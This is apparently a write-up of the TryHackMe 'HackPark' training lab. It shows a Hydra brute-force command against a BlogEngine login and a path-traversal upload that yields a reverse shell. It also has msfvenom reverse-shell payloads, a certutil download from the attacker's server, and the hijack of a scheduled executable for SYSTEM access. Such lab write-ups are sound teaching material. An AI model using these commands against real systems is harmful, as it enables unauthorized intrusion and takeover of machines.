Links

THM -HackPark

This walkthrough describes my approach to the 'Hackpark' room on TryHackMe. This room was more challenging than anticipated and required outside the box thinking to complete.

Scanning and enumeration

Like usual I began this machine by executing an Nmap scan. My first attempt at scanning suggested the machine wasn't alive on the network, but adding -Pn to disable host discovery resolved the issue.
From the scan we see two open TCP ports; an IIS server on port 80 and what appears to be RDP operating on port 3389. We also see from one of the default scripts executed from using the '-sC' flag that there is a webpage titled 'hackpark' on the web server.
Opening the web page we're greeted by a familiar image, Pennywise. Further enumeration of the page provides two additional clues that might help us gain access to the page.
The page also includes an Archive, which may provide usernames. Further examination reveals that there is only one user, but it still might pay off. We identify two versions of the username that we'll save for later: 'Adminstrator' and 'Admin'.

Establishing a foothold

Next, we turn our attention to the login page. Reviewing the page source (network tab) reveals that the page is using POST messages to complete login. Since we already have two possible usernames we may be able to brute force the post form with Hydra.
Setting up Hydra is fairly straight forward but requires additional information in order to brute force HTTP forms. The command should be formatted like the following:
Hydra -l <username> -P <list location> <IP> http-post-form “<path>:<requestbody>:<fail verbiage>
First, we create a list of the usernames discovered during enumeration. This is accomplished by creating a .txt file using your editor of choice. Be sure to include variations of the names you found.
Next, we return to FireFox to gather the additional required information. We use FireFox's built in inspector tool to gather the information.
  1. 1.
    Right click on the password field and select "inspect element."
  2. 2.
    Select the "network" tab then attempt a login to generate a post request.
  3. 3.
    Select the post request, then click the "resend" dropdown and select "edit and resend" to view the request.
  4. 4.
    Capture the information contained in the "URL" and "Request Body Fields."
  5. 5.
    Add the information to the payload and be sure to replace the user and password fields with ^USER^ and ^PASS^. The final payload should look like the following:
hydra -L Documents/usernames.txt -P /usr/share/wordlists/rockyou.txt 10.10.123.151 http-form-post "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=TOBW8QB2Q1bJrd7T7HsS3fWFCIZpV%2BSQtzBYlIkaU4ByFOGGPbsPj4DSWfzE76ESPJ%2FAixlw2qczi60QSYlOlWbeDdJH%2FPD%2Bk28%2FSXg39HjUlbJh5osYPtt3g%2B28B26yy20WoJhmTf2C%2B7SJ4obtCMSaedImhrhNSKEr1d1rG1P%2BMc%2FV&__EVENTVALIDATION=qArfCXjRgc%2FupGmTQg94iY45Zhm%2FDcY6J2yn04JGA7L7UV1KeIx2EZV3EyAJ6GJ2cRKddbCCFFdcKOVHxxqpRr%2FBzvfkGKtcTSrby02Ac%2FnFBimu3PdUoge83U%2BLHPH%2BRuMIPDkCO2ASIW7SouDvT4NmgE6A%2Fe1I4fhXybvPHiWF3i1N&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
We execute the command and within a few moments Hydra provides two sets of credentials.
We are able to successfully log in to BlogEngine using the credentials and begin enumeration. Under ‘About’ we find that this particular blog utilizes BlogEngine version 3.3.6.0. A quick google search reveals an exploit for this version.
This exploit is fairly straightforward and simple to execute.
  1. 1.
    Download the exploit to the attacking machine.
  2. 2.
    Update the IP address to that of the attacking machine, and change the port (if desired).
  3. 3.
    Start a Netcat listener on the attacking machine to catch the incoming connection.
  4. 4.
    Return to BlogEngine and open the pre-existing post
  5. 5.
    Select the File icon and upload the exploit. Be sure to rename the file as ‘PostView.ascx’ prior to upload.
  6. 6.
    Navigate to http://10.10.49.8/?theme=../../App_Data/files (update IP accordingly). If you’ve done everything correctly the page will hang and you’ll receive a reverse shell.

Privilege Escalation (no Metasploit)

Before we begin enumerating for privilege escalation we need to upgrade to a fully interactive shell. The systeminfo command reveals that the target is running Windows Server 2012 R2 Standard, 64-bit. To upgrade the shell, we first generate a paylaod with MSFVenom with the following next.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.6.24.176 LPORT=4450 -f exe > shell.exe
Next, upload the payload to the target. On Windows I prefer setting up a SimpleHTTPServer on the attacking machine and downloading the desired file(s) using certutil on the target.
certutil -urlcache -f http://attackerip/shell.exe shell.exe
After uploading the payload to the target, start another Netcat listener on the attacking machine. Run the payload on the target and you'll receive a fully interactive shell.
Now we can focus our attention to escalating our privileges. We start by uploading WinPEAS, again with the assistance of the SimpleHTTPServer and certutil.
Running WinPEAS provides comprehensive results including several possible privilege escalation options. One that seems particularly interesting is a service called SystemScheduler. (Note: I made several unsuccessful attempts to exploit the available autologon credentials before moving on to this service)
Further examination of the SystemScheduler service suggests that it contains a privilege escalation exploit. Initial review of this exploit suggests it should work on this system; however, after several attempts it does not.
In fact, getting this exploit to work requires more enumeration. We know from WinPEAS that the service is present, and the service control command confirms that the service is running; however, the suggested service (wservice.exe) does not seem to be running on a schedule.
After a good bit of searching, I located the program's log files in C:\Program Files (x86)\SystemScheduler\Events. In the events directory is a file named '20198415519.INI_LOG.txt'. Viewing this file reveals that a different executable (Message.exe) is running at :00 and :33 of every minute!
Now that we've identified the correct executable, exploitation is simple.
  1. 1.
    On the target machine, rename Message.exe to Message.bak
  2. 2.
    Create a new payload with MSFVenom and name it Message.exe.
  3. 3.
    Start a Netcat listener on the attacking machine
  4. 4.
    Upload the payload and wait for the program to run
  5. 5.
    Root!
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.6.24.176 LPORT=4450 -f exe > shell.exe
The flags are located on jeff & Administrator desktops.